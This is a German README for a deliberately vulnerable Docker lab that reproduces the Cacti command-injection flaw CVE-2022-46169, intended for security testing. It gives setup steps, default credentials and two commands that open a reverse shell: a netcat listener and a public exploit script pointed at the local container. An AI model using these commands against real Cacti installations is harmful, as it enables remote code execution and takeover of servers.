
WARNUNG: Dies ist eine angreifbare Anwendung zum Testen des Exploits für die Cacti-Befehlsinjektion (CVE-2022-46169). Auf eigene Gefahr ausführen!
Dies ist eine verwundbare Anwendung zum Testen des Exploits für die Cacti-Schwachstelle (CVE-2022-46169).
Diese Anwendung enthält schwerwiegende Sicherheitslücken. Führen Sie sie auf eigenes Risiko aus! Es wird empfohlen, eine gesicherte und abgeschottete Umgebung zu verwenden (z. B. eine VM mit einem aktuellen Snapshot und Host-only-Netzwerk). Laden Sie diese Anwendung nicht auf öffentlich erreichbare Server hoch, da diese kompromittiert werden.
HAFTUNGSAUSSCHLUSS: Ich übernehme keine Verantwortung für die Art und Weise, wie jemand diese Anwendung verwendet. Der einzige Zweck dieser Anwendung ist es, ein Testszenario für den CVE-2022-46169-Exploit zu sein, und sie sollte nicht böswillig verwendet werden. Wenn Ihr Server über eine Installation dieser Anwendung kompromittiert wird, liegt das nicht in meiner Verantwortung, sondern in der Verantwortung der Person(en), die sie hochgeladen und installiert haben.
Hier sind die Schritte zum Einrichten der Umgebung:
docker compose up -d aus, um die Umgebung zu starten.admin/admin.Der Container wird vuln-cacti genannt.
Zum Herunterfahren der Umgebung verwenden Sie den Befehl docker compose down.
Die offizielle Installationsanleitung von Cacti finden Sie hier.
Eine detaillierte Grundursache der Schwachstelle ist hier verfügbar.
Ein öffentlicher Exploit ist auf Exploit-DB verfügbar. Er wurde der Einfachheit halber in den Ordner exploit/ kopiert.
Um ihn auszuführen:
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
host.docker.internal wird verwendet, um vom Container aus auf den Host-Rechner zuzugreifen (Referenz).Es gibt auch einen Eintrag im vulhub-Repository.
Dieses Projekt ist unter der Unlicense lizenziert – siehe die Datei LICENSE für Details.